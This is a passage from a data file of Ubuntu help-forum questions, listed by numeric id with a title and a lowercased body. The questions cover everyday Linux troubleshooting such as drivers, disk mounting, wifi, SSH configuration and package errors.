usb-0000:00:1d.0-1.2:2 [ 126.718779 ] iwlwifi 0000:02:00.0 : tx aggregation enabled on ra = 84 : a8 : e4:65:51 : c4 tid = 0 [ 1245.220487 ] iwlwifi 0000:02:00.0 : tx aggregation enabled on ra = 84 : a8 : e4:65:51 : c4 tid = 6 thanks a lot in advance for your help !
346785	phpmyadmin is not working after installing the xampp in ubuntu 13.04	after installation of xampp in ubuntu 13.04 ... and i am unable to process the phpmyadmin and it 's showing the following error ... access forbidden ! new xampp security concept : access to the requested object is only available from the local network . this setting can be configured in the file `` httpd-xampp.conf '' . if you think this is a server error , please contact the webmaster . error 403 localhost apache/2.4.3 ( unix ) openssl/1.0.1c php/5.4.7 i surf on internet and tried the following process to overcome the problem but no use ... $ gksudo gedit /opt/lampp/etc/extra/httpd-xampp.conf and replace this code : < directory “/opt/lampp/phpmyadmin” > allowoverride authconfig limit order allow , deny allow from all < /directory > with this one : < directory “/opt/lampp/phpmyadmin” > allowoverride authconfig limit order allow , deny allow from all require all granted < /directory > how can i get rid of this problem ? ?
346791	publishing an app for ubuntu software center	i have a game i wish to publish for ubuntu software center for free . can i just zip all my files for submission , or do i need to create a .deb package first before submitting ?
346794	how to understand commands used in ubuntu	i want to understand the commands which are used for doing anything in ubuntu means starting from sudo , apt-get , to everything .i want to have the knowledge of commands used in ubuntu.i have searched google for this stuff and found something related to shell scripting.please help me out from where to start this , i want to expertise over the terminal commands.i don`t know where this expertise is going to be used but i want to learn as it attracts me.please give me the resources , e books and the forums where i can post my doubts and queries .
346798	are updates released all at once or ad hoc ?	does ubuntu have a fixed package update cycle like microsofts patch tuesday ? or are packages just updated and released ad hoc . i 've checked around and ca n't find an answer which makes me think they are released as and when they are needed .
346802	unable to access my encrypted internal hard drive with win 7 on it	i 'm quite new to ubuntu and i 've tried all the post related to my issue but could n't solve it . i 'll try to give as much information as possible . i 'm using 12.04 lts on an external hard disk and boot my machine with ubuntu . the external hard disk on which ubuntu is installed is partitioned into two : p5 and p6 . p5 is the one where ubuntu is installed and p6 is for storage purpose . when i logon to ubuntu , i 'm not able to mount my internal hard disk . if i use sudo fdisk -l , i can see the internal drive there but when i try to mount it , it gives me ntfs signature is missing . here are the results of the two cmds : $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xeef597d0 device boot start end blocks id system /dev/sda1 * 2048 625139711 312568832 7 hpfs/ntfs/exfat disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x389ea96f device boot start end blocks id system /dev/sdb1 63 106710400 53355169 7 hpfs/ntfs/exfat /dev/sdb2 106711040 488392703 190840832 7 hpfs/ntfs/exfat $ sudo mount -t ntfs-3g /dev/sda1 /media/external ntfs signature is missing . failed to mount '/dev/sda1 ' : invalid argument the device '/dev/sda1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? here i 'd like to inform that my internal hard disk is encrypted and is protected with a pwd . when i normally bootup my machine , it first asks me to enter the hdd pwd and then the encryption pwd and then it logs me into win 7 . i think that it 's because of the hdd pwd and encryption that i 'm not able to mount my internal drive to ubuntu but not sure . is there a way that i can mount my internal drive onto ubuntu without removing the hdd pwd or encryption on my internal drive ?
346803	l2tpv3 support out of the box	i 'm looking to do a l2tpv3 pseudowire over ethernet . the linux code has been around since 2.6 in the kernel , but ubuntu does n't seem to support it without a kernel recompile . what is your suggestion to address the issue ?
346804	one ubuntu laptop on wifi occasionally makes other laptop 's connection slow	there are two dell laptops on our home 's wifi : inspiron 1525 latitude e5420 these connect along with several other devices ( ipad , phones ) with which we have no trouble at all . the laptops are both running ubuntu 12.04 . sometimes the laptops both work fine ; but occasionally - often after a good hour or more of simultaneous use - one or other laptop will suddenly experience a very slow wifi connection . if the working laptop 's networking is disabled , the problematic laptop 's speed bounces back . re-enabling the networking kills the problematic laptop 's connection again . this has happened with each laptop sometimes having the problem ; usually the one nearest the router is most likely to be ok . here 's some of the things i 've ruled out : mac and ip addresses are different ( sudo ifconfig ) . but then if they were conflicting , then the problem would surely not be intermittent ! power management is turned off for both wifi connections ( sudo iwconfig ) router and isp have both changed while we 've had this problem : we switched broadband providers from o2 to the phone coop , but the problem persisted ; at the same time we went from a speedtouch router ( i think ) to a technicolor tg582n . so it 's unlikely that 's the problem . link strength is ok ; but then again , unless two completely different routers had link strengths varying in similar ways , then you 'd expect that to be the case . testing for a possible bug in the wl drivers ( suggested by @ braiam ) below , the output is as follows . on laptop-1 : laptop-1 % sudo lspci -nnk | grep -a8 -i network 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 [ 1028:0010 ] kernel driver in use : wl kernel modules : wl , bcma , brcmsmac 03:00.0 cardbus bridge [ 0607 ] : o2 micro , inc. device [ 1217:8134 ] ( rev 06 ) subsystem : dell device [ 1028:049b ] kernel driver in use : yenta_cardbus kernel modules : yenta_socket 09:00.0 firewire ( ieee 1394 ) [ 0c00 ] : o2 micro , inc. 1394 ohci compliant host controller [ 1217:13f7 ] ( rev 05 ) on laptop-2 : laptop-2 % sudo lspci -nnk | grep -a8 -i network 0b:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) subsystem : intel corporation device [ 8086:1021 ] kernel driver in use : iwl3945 kernel modules : iwl3945 anyone know what are the likely remaining causes of this problem ; more importantly , how do i diagnose and test those causes ?
346808	how to solve frozen screen after installing bittorent ?	im new and i dont know what to do : i just installed 12.04 on a newly built computer . ( dont know anything about linux but figured its a good way to learn . ) well had it running for a couple days . i installed bittorrent through software center . i went to click options and then the program get frozen . so i restarted . it restarted , then when i clicked on something it froze again . now : i cant get past my gigabyte mobo screen . cant enter setup . cant enter boot menu . nothing .
346811	how to force audio from speakers and headphone	im looking to install ubuntu on my laptop , problem is that i damaged the headphone socket and it thinks there is always headphones plugged in . i know in windows i can force audio to play from both the speakers and the headphones at the same time . is this possible in ubuntu/linux ? thanks !
346812	plex manager ca n't read files on external hd ( automonted )	i 'm having a lot of difficulties in getting plex working . i have mapped 3 sections . 2 on my automonted external disk , 1 is on my home folder ( images ) which is working fine . problem is when i try to acces files on hdd it says that file is not available . if i run : sudo mount -t ntfs-3g /dev/your-ntfs-partition /media/discoexterno i can access it . do n't know what to do..
346814	slow boot after login 13.04 ( bootchart attached )	after login , there is a minute plus delay before using the computer . this does not happen on other accounts on the machine . i am not sure from the boothcart , but it looks like ureadahead is the culprit ? is n't this supposed to speed up my boot process ? any thoughts appreciated ! bootchart image
346816	> = 12.04 : bluetooth mouse connects , but pointer does n't move	i have a bluetooth mouse ( `` a4tech bt-630 '' ) and a small laptop with a tiny bluetooth module connected via usb . i 'd been using lubuntu oneiric for 2 years . my mouse worked flawlessly ( i used blueman to set up connection : no pairing , only connect to pointing service ) . recently i decided to check out some modern ubuntu-based os . so i installed ubuntu precise ( of course , i use blueman as a graphical front-end with same configuration ) . i turn on my machine , then i log in , after that i switch on my mouse ( there is an on/off switch on the bottom of the mouse ) . mouse connects , the red light on the bottom turns on , in dmesg i see the following : [ 2041.034103 ] input : bluetooth mouse as /devices/pci0000:00/0000:00:1d.1/usb3/3-1/3-1:1.0/bluetooth/hci0/hci0:43/input11 [ 2041.036008 ] generic-bluetooth 0005:09da:80f0.0003 : input , hidraw0 : bluetooth hid v0.1e keyboard [ bluetooth mouse ] on 00:83:15:39 : ac : d4 but the pointer does n't move . then i switch the mouse off , switch it on again ( red light appears , the same strings in dmesg are printed ) and everything works fine . every time i start my machine i face this problem . it also appears periodically when i try to `` wake '' my mouse . yesterday i installed linux mint maya mate ( 12.04 based distribution ) . the problem remained . okay , the kernel is 3.2.x . in oneiric it was 3.0.x . so i downloaded 3.0.9 compat-wireless , 3.0.x headers and compiled `` btinstall '' target . this made no changes . when i turn on my machine , i ca n't make pointer move for a first time . and it 's quite annoying . so ... maybe someone can help me ? p.s . i also tried to configure the mouse using this instruction : arch : bluetooth mouse configuration no changes .
346820	/ , /home and swap partition sizes when using multiple drives	i 'm about to install ubuntu 13.04 on my computer and i 'm wondering how big each partition should be . i read that the swap area should be twice the size of your install ram and i figured /home should take the space you have left , but how big should / be ? further to this , i have two 500gb hard drives and want both of them to be available when i use the computer . should i put / and swap on one drive while letting /home be on the other or should i put all partitions on one drive ? if putting all partitions on one drive is the best option , what file-system should the other drive use ? oh and just to clarify : i do n't want to dual boot â just want the whole system to run ubuntu .
346824	disabling touchpad after suspend/resume	there are several questions about disabling touchpads on laptops on this site , but none of them seem to quite answer my question . i want to disable my touchpad ( i 've done that bit ) and keep it disabled after a suspend/resume ( i am failing here ) . i am running ubuntu 12.04 on a cheap chinese laptop . i have an executable file /home/yannick/bin/notouch which looks like this : xinput set-prop `xinput list | grep `` imps/2 generic '' | awk ' { print $ 7 } ' | sed `` s/id=// '' ` `` device enabled '' 0 the script runs xinput once to get the id number of ( what turns out to be ) my touchpad , and then runs xinput again to disable the touchpad . i have it in my .bashrc and in other places . at present , when i suspend and then resume my laptop , the touchpad comes alive again and i really want to stop this happening . so i also have a file /etc/pm/sleep.d/97disable_touchpad ( owned by root , +x ) which looks like this : # ! /bin/bash case `` $ 1 '' in thaw|resume ) /home/yannick/bin/notouch 2 > /tmp/notoucherrors ; ; * ) ; ; esac exit $ ? and darn it , it does n't work ! indeed the script does seem to run after a resume , and the content of /tmp/notoucherrors is : unable to connect to x server unable to connect to x server dammit i want my touchpad to stay disabled when i hibernate and resume . how do i make this happen ? here are two other things i tried and that i could n't get to work : 1 ) $ synclient touchpadoff=1 this returns could n't find synaptics properties . no synaptics driver loaded ? 2 ) system settings - > mouse and touchpad . i only have options for mouse there ( i would even go so far as to say that ubuntu thinks that my touchpad is a mouse for some reason ) . in particular there is no option to turn the touchpad off -- all i have is mouse options ( general , pointer speed , drag and drop , double-click timeout ) .
346826	the simplest/easiest possible way to remote into an ubuntu desktop ?	i 'm going to set up a new ubuntu install for my dad . i know there will be times he 'll be asking for help , so i need a way to remote into that box ( a free solution ) . what do you guys recommend ?
346829	how to install a package from launchpad which does n't belong to a ppa ?	i am running kubuntu 12.10 ( quantal ) and i want to install ike-qtgui , available in launchpad at https : //launchpad.net/ubuntu/quantal/+package/ike-qtgui the package is not part of a ppa , but it is not in the official repository . can i configure apt to use the `` root '' launchpad as a package source ? is the only solution to download the .deb file and install it manually ?
346831	custom keyboard shortcut to generate a certain character	i want to be able to press alt + c to generate ă , and alt + shift + u to generate ă , and so on . how can i do this ? compose key does n't allow me to make a custom shortcut , nor does dead keys .
346834	how to install windows 7 or dual boot windows 7 from existing ubuntu 12.04 ?	how do i install windows 7 or dual boot windows 7 from my existing install of ubuntu 12.04 ? currently using ubuntu 12.04 and need to access windows 7 for gaming purposes since linux doesnt have easy enough porting for certain games . i installed ubuntu 12.04 from a bootable usb and deleted my windows 7 . not the greatest with booting and partions so step by step instructions of what to do to either replace ubuntu with windows 7 or create a dual boot for windows 7 would be fantastic .
346838	how do i configure my dns settings in ubuntu server ?	according to this page it appears to be simple . however , /etc/bind does not exist on the default installation of ubuntu 12.04.3 lts server . so , without installing any further software , how can configure dns and remove dnsmasq on ubuntu server ? i am quite familiar with sudo & nano .
346840	problem with graphics on macbook pro 8,2	i 'm currently using linux mint 15 but i had the same problem on the kubuntu 13.04 . i have my computer running of an efi stub loader . this allows for me be able to boot up with both my intel and ati card up . this is my intel card : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ radeon hd 6600m/6700m/7600m series ] controller ( rev 09 ) '' and this is my ati card : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ radeon hd 6600m/6700m/7600m series ] i 'd like to be using only one of them though as i think it may be affecting my computer battery and heating . if i switch to the integrated intel chip and restart my session i just get a black screen . everything seems to be running just without a display . apparently this is due to the driver not loading the lvds panel mode ( https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1171940 ) . ifi try using catalyst it wo n't even load x when i restart and will just push my straight into a terminal session . any ideas on a way i can get the catalyst to work ? and if not that then is there a way to patch my kernel so the intel driver does load lvds . ?
346841	how can i change the language in my launchpad account ?	i 'm not able to change the language in my launchpad account . i 've tried to do it from the edit language page after clicking on the little yellow pen . how can i do this ?
346842	can not connect to the internet through an ethernet cable	i have ubuntu 12.04 lts . when i plug in an ethernet cable it does not even recognize it . i tried to enter all the information i could ( like my ip address and the hardware address of the ethernet port ) but it still does not even recognize it . i have a dell inspiron from the year 2012 . does anyone know what is wrong ?
346844	ca n't hear through logitech h800 headphones	note : i know very little about unbuntu sound ... i have a brand new logitech h800 wireless usb headset , which i have installed on my ubuntu 12.04 system . i know that it is working somewhat , because i can see it in alsamixer . plus , i can : # cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xfbe00000 irq 77 1 [ headset ] : usb-audio - logitech wireless headset logitech logitech wireless headset at usb-0000:05:00.0-1 , full speed so , it appears to be recognized . plus , i can change the volume with the headset controls ( i see a little window open up and the volume bar goes up and down ) . however , i ca n't get anything to play through the headphones . when i go into system settings- > sound , i get three options on the output tab : hdmi/displaypord 3 ( built-in audio ) digital output ( s/pdif ) ( built-in audio ) analog output ( built-in audio ) i do not have any options for the headphones . on the input tab , i have : microphone ( logitech wireless headset ) so , yet again , it is recognized , but not on the output side ! how do i get this working ? what am i missing ? thanks in advance ... eric
346846	add raid 0 to 13.04 desktop	i have a buffalo nas whose network interface crapped out . i want to take the two 500 gb drives set up as raid 0 out and put them in a 13.04 desktop so i can access the data . any answers ? suggestions ? i also have a windows 7 machine i could try this on . i only trust ubuntu though . following your instructions i get the result : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x21e120e1 device boot start end blocks id system /dev/sda1 63 2008124 1004031 83 linux /dev/sda2 2008125 12016619 5004247+ 83 linux /dev/sda4 12016620 976768064 482375722+ 5 extended /dev/sda5 12016683 14024744 1004031 82 linux swap / solaris /dev/sda6 14024808 974984849 480480021 83 linux disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 63 2008124 1004031 83 linux /dev/sdb2 2008125 12016619 5004247+ 83 linux /dev/sdb4 12016620 976768064 482375722+ 5 extended /dev/sdb5 12016683 14024744 1004031 82 linux swap / solaris /dev/sdb6 14024808 974984849 480480021 83 linux disk /dev/sdc : 1007 mb , 1007681536 bytes 31 heads , 62 sectors/track , 1024 cylinders , total 1968128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d82ba device boot start end blocks id system /dev/sdc1 * 62 1968127 984033 c w95 fat32 ( lba ) note : the package mdadm is not present on the live usb boot . in terminal i ran : sudo gparted this resulted in ; /dev/sda 465.76 gib /dev/sdb 465.76 gib /dev/sdc 961.00 mib does that help ?
346847	wireless device does not work on dell inspiron 3521 after installing ubuntu 12.04	wifi does not work at all on inspiron 3521 after installing ubuntu 12.04.. when i type in lspci -nn the wireless device is even not on the list . please help in this topic !
346850	windows change of workspace themselves	i 'm in ubuntu 13.04 64 bits and i 've noticed that my windows change of workspace themselves , that 's very annoying and i want to fix it . i could n't say when it changes exactly . but i 've noticed that they changes when i press alt+tab to change the window , suddenly , my window has changed of workspace ! ! it specially happen when the window to i switch with alt+tab if it was moved in the screen by me , above all if it was moved near to the edges of the screen . it has happened from the beginning of my installation of ubuntu and i 've found anyway of fix it in compizconfig neither ubuntu tweaky tool .
346857	how do i force ssh to only allow uses with a key to log in ?	i tried following the instructions here : http : //lani78.wordpress.com/2008/08/08/generate-a-ssh-key-and-disable-password-authentication-on-ubuntu-server/ to only allow users with a public key on the server to authenticate , but i ca n't get ssh to disallow logging in with only a username/password . here is my sshd_config file - am i missing anything ? i already tried restarting ssh and the computer itself . http : //pastebin.com/8ncehb4c
346858	-bash : ./* : no such file or directory	i am attempting to write a bash script to return the following information from cpuinfo using the following commands ./systemstat.sh -r to return the time along with total number of eth0 packets . ./systemstat -c to return the vendor_id= and cpu mhz= . when i use those commands , i recieve -bash : ./systemstat.sh : no such file or directory .
346860	access key id error when deploying with juju-core on non-ec2 ec2 clouds	juju-core ( 1.13 ) does not support the old pyjuju configuration variables ec2-uri and s3-uri . so i took the go sources and tweaked a new region in launchpad.net/goamz/aws/aws.go with the necessary api endpoints ( greenqloud ) . now juju bootstrap does not immediately say ; error : the aws access key id you provided does not exist in our records which it used to say immediately before making the change . now it takes approx 15 seconds for it to give the same error . i added debug to launchpad.net/juju-core/provider/ec2/ec2.go - > setconfig ( ) and verified that it is passed through ok. any hints on what else could be possibly making requests to amazon api instead of the greenqloud endpoints i specified ?
346861	ubuntu touch import contacts	how to import contacts in ubuntu touch ( current release i.e . installed on 17. september ) ? the manage-address-books.py mentioned in the release notes seems not to exist anymore ( at least i did not manage to find it ) . is there a simple way to import vcards using syncevolution or does a dbus service exist for creating/importing contacts ?
346864	how do i take a screenshot ?	i 'm not really sure since i 'm still new to linux distros in general
346868	sound problems ubuntu 13.04 how to enable pci	i just recently installed ubuntu 13.04 on my dell e1705 laptop , the first time i installed it everything worked but the native wireless . i eventually got that going , then installed google earth and it said my video driver was n't adequate . after encountering lots of trouble with nvidia drivers , i re-installed ubuntu and re-configured the b43 ndiswrapper wireless , allowing my native pci card to work , so i was happy as a bug in a rug , until i tried to watch a youtube video . no sound ! ! in my settings it says i 'm using `` dummy '' soundcard , but lspci shows : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) says i have a intel card , why is n't it working ? any help is much appreciated as i am an avid music lover : - )
346869	what are the diffrences between netcat-traditional and netcat-openbsd ?	what ( if any ) are the significant differences between netcat-traditional and netcat-openbsd ? i 'm having trouble finding any relative information . anybody familiar that can offer some insight ?
346874	ubuntu error : low on graphics mode amd radeon 6470m	i used my ubuntu last night and it was working . this morning , when i opened my laptop , and switched to ubuntu , i got an error saying : low on graphics mode . i could not press anything on the keyboard and the mouse is not working either . so i went to the command line . i checked if the greeter-session is unity-greeter and it already is ( which is one of the solutions ) . i reinstalled my ubuntu and rebooted it ; it did n't work either . the last solution i found is to install fglrx then reboot my computer . sadly , this did n't work either . i tried going to failsafex . i looked at the other options in the recovery mode in the grub menu . none worked . the last thing i installed in ubuntu is php and apache . i use intel core i5 , windows 7 by dell . my graphics card is by amd radeon hd 6470m . how can i fix this ?
346875	installing ubuntu on existing raid 1 with complete rebuild	my desktop machine is currently running windows xp ( 32 bit ) on an amd sempron processor . for various reasons , this is far from satisfactory , & my plan is to do a complete rebuild , with ububtu ( 64 bit ) as the operating system . currently , i have two 500 gb drives set up as a raid 1 mirror ( i believe they are being supported by what 's termed `` fakeraid '' ) . is there a procedure by which , when i have the two drives plugged into the new motherboard , i can then install ubuntu in such a way as to have it treat them as an existing raid 1 , rather than as two separate discs ? can this be accomplished by running the software raid manager from the live usb device , or what do i need to do , assuming i can do anything ?
346877	xrandr , screen rotation and what is it actually doing ?	i 've put together a tiny 480x800 hdmi screen that is attached to a beagleboneblack running ubuntu 13.04 on a 3.8.13 kernel . 480x800 ( 0x42 ) 25.0mhz +hsync -vsync *current +preferred h : width 480 start 481 end 487 total 488 skew 0 clock 51.2khz v : height 800 start 801 end 804 total 805 clock 63.6hz i can get it to display at 480x800 but whenever i try and rotate the screen left or right using xrandr -o left my display shutdown . so my question is , what is xrandr telling the display driver to do to the signal ? is it changing the vsync/hsync , clock speed and other display settings outputted that is not reflected in the verbose output of xrandr after the rotate ?
346881	enable hibernation for hp pavilion dv6 laptop with ubuntu 13.04	i am a new ubuntu user , having set up my hp dv6 to dual boot ubuntu 13.04 . i found to my horror that closing my laptop and putting in my backback is extremely dangerous - by default closing the lid sends the computer into suspend ( still sucking power and causing it to overheat ) and that hibernation is not enabled . i tried to fix this in line with the answer here . however this still did not enable hibernation . i have googled extensively and have tried many things , none of which seem to work . when i run sudo pm-hibernate in the terminal , the computer does actually seem to hibernate ; but it is only for about 15 seconds and the computer resumes , with the session saved . i do n't know if this is a successful hibernation , but it seems not to be since all the tutorials say it is successful if it hibernates , followed by the instruction to manually power back on . i 'm thinking ubuntu might not be for me , but my friend says you guys are great and i should be patient . i will follow up asap with any requests for more system information from me - i do n't know what you guys might want to see . i would greatly appreciate any help , please forgive the wordiness . i wonder if it might have something to do with my swap partition , so i am posting this capture of my system information : following the request in the comments , i have : john @ john-hp-pavilion-dv6-notebook-pc : ~ $ sudo pm-is-supported -- hibernate [ sudo ] password for john : john @ john-hp-pavilion-dv6-notebook-pc : ~ $ echo $ ? 127 john @ john-hp-pavilion-dv6-notebook-pc : ~ $ [ it had said '0 ' after echo $ ? , but after re-running the terminal script i linked to originally , i got a '127 ' ] i ran pm-hibernate again and this time it actually completely shut off and i had to restart . it rebooted , even prompting me if i wanted ubuntu or win 7 and my session was saved . so that seems like a success . my requested log files are here : https : //drive.google.com/folderview ? id=0b1m2fljxnwcbwxblvkl6nnjiznc & usp=sharing
346882	why my log files are n't being filled ?	i noticed the version of ubuntu i deployed from image on a vps does not have a lot of the logging enabled . i do n't see any syslog or auth log . is there a way to restore to the default logging preferences ? there is not a gui . i do everything from the shell .
346883	login loop with gdm and lightdm , startx works	i am running 12.10 . attempting to login via gdm lands me back at the login page . the behaviour is the same for when i switched to lightdm . logging in with guest is fine , and logging in with a test account i created is fine . if i access tty1 , login with my account and then startx , i get to my desktop fine . any ideas ? i have tried chowning xauthority and then removing it but to no success . the problem appears to be a setting in my account , although i have no idea what as when i last used my computer before the problem occurred i did n't do anything abnormal ( i.e . system updates or changing any user settings ) . update : solved solved thanks to help from braiam . my ~/.xsession-errors.old file had the following : /usr/sbin/lightdm-session : 34 : /home/*username*/.profile : source : not found /usr/sbin/lightdm-session : 42 : /home/*username*/.profile : syntax error : `` ( `` unexpected i had recently added some lines to my .profile to provide useful git information in my prompt . it worked fine when logging in via tty1 and then running startx , however it seems it was stopping me from logging in via gdm / lightdm
346886	not dual booting with ubuntu linux 12.04 lts 2	i had a distro of linux on my computer , i decided to install windows but once i did i was no longer able to access my linux distro anymore . i made sure when doing the process in the beginning that they were partitioned correctly . so i guess i need to install a bootloader ? if so which one , and how do i configure it so that it will read bot os 's . please help .
346888	nvidia gt 610 loss of unity dash	first problem on log is : xlib : extension `` glx '' missing on display `` :0 '' . compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . i have tried the suggestions above with no luck . any suggestions ? thanks .
346890	long term bandwidth monitoring by port	i represent a reasonably popular game server community here in australia . we rent a dedicated server that has limited bandwidth . in the last couple of days we have seen a huge spike in our bandwidth consumption , despite outsourcing our download server to the us . we are very interested in figuring out what exactly is using all this bandwidth suddenly . each of our servers is assigned a specific port , so it makes sense to monitor bandwidth by port . we 'd like to do this monitoring over a reasonably long time period so that we can see accurate results . here 's a list of things i 've tried and the problems i 've had with them . nethogs - monitors bandwidth per process and therefore does n't seem to properly count bandwidth for services using child processes ( for example , i 'm pretty sure apache has used more than 0.8mb over the last 2 days ) iftop - monitors bandwidth by host , data seems pretty useless considering the amount of users we have . our load is most likely not caused by one person but by all of them . iptraf - monitors bandwidth by connection instead of by port , so the data is useless to us . darkstat - groups connections by host instead of by port . vnstat - monitors bandwidth by interface not by port . bandwidthd - measures by host or subnet not by port . is there a tool that exists that would help me out ? thanks , ym
346891	dual-booting ubuntu with un-activated version of windows xp ?	my sister wants to install ubuntu on her toshiba satellite , which is a few years old . problem is , her copy of windows xp is not activated , and whenever she tries to activate it , she is told by that her activation number is invalid . so , would she still be able to install ubuntu on her computer ? also , i already have a 4-gb flash-drive , but where would i find the installation files ?
346893	why does my dash background look pixeled and screwed up ?	it was like this when i first installed it , and even with a picture from the internet saved as my background it still looks like this . ( if it matters i am running a dual-boot with windows and used wubi to install ubuntu )
346894	reading from multiple serial ports in ubuntu	iâ´m trying to read and record data from two usbs that are connected to separate arduinos and they are collecting different measurements . iâ´m having difficulties even reading from a single serial stream in ubuntu i have ubuntu installed via oracle vm virtualbox . i used to use cygwin and would simply navigate to the folder i wanted to store my txt file and write : tee < /dev/ttys1 test.txt to monitor and record the data stream . if i write the same command in a random folder in ubuntu , i get permission denied , even if i add sudo in front . how can i monitor and record a single serial stream . how can i monitor and record multiple serial streams ?
346895	unable to install any packages	so i had a full /boot and i 've really messed things up now . what i 'd really like to do is run sudo apt-get purge linux-image-3.2.0- { 35,36,37,38 } but i need to fix these other problems first . so when i run sudo apt-get -f install this is what i get ( i also get similar output for any other apt-get commands ) $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-generic-pae the following packages will be upgraded : linux-generic-pae 1 upgraded , 0 newly installed , 0 to remove and 192 not upgraded . 1 not fully installed or removed . need to get 0 b/1,726 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.41.49 ) ; however : version of linux-image-generic-pae on system is 3.2.0.53.63. linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.41.49 ) ; however : version of linux-headers-generic-pae on system is 3.2.0.53.63. dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) but this does n't tell me enough what the other error was . i think it started when i ran sudo apt-get -f install with only about 20mb of free space in /boot . grrr , /boot partition is super annoying .
346898	scaled down openstack grizzly installation with juju and maas	i would like to test openstack grizzly deployment in the similar way described in how can i install openstack grizzly using juju and maas ? with a limited number of servers , leveraging on virtual-maas capability . i was not able finding any documentation and i would appreciate if anybody can share experiences or point me in the right direction . thank you , luca
346900	what does set -e do ?	i have a script that i found and i trying to get it to run , it just downloads and install apache runtime libraries . the first line is set -e and it is causing an error ; what does set -e do ?
346901	poor performance using proprietary amd drivers in wine , is there a way to improve it ?	well lets start : i have the proprietary drivers installed , i am using ubuntu 13.04 , my video board is an amd radeon hd 7970m with 2gb of vram , in a clevo/sager p150hm , 6gb ram ddr3 , intel core i7 processor 2.4ghz wine : stronghold crusader hd : fine , diablo 2 hd mod : fine , mohaa : slow at max setting , ether saga : slow heroes of the three kingdoms : slow , mk ke do n't even start , d3d error attributed to lack vram , the kings of figther xiii : slow as continental drift , soul reaver1 : good ( is a really old game ) , blood omen1 : good ( even older ) all the games that run slow in ubuntu i play on ultra settings in windows 7 x64 , and in some cases two games at time .
346902	recent file viewer for xfce ?	is there any other ''recent file viewer '' besides gnome activity journal ? since gaj does n't seem to work using xfce .
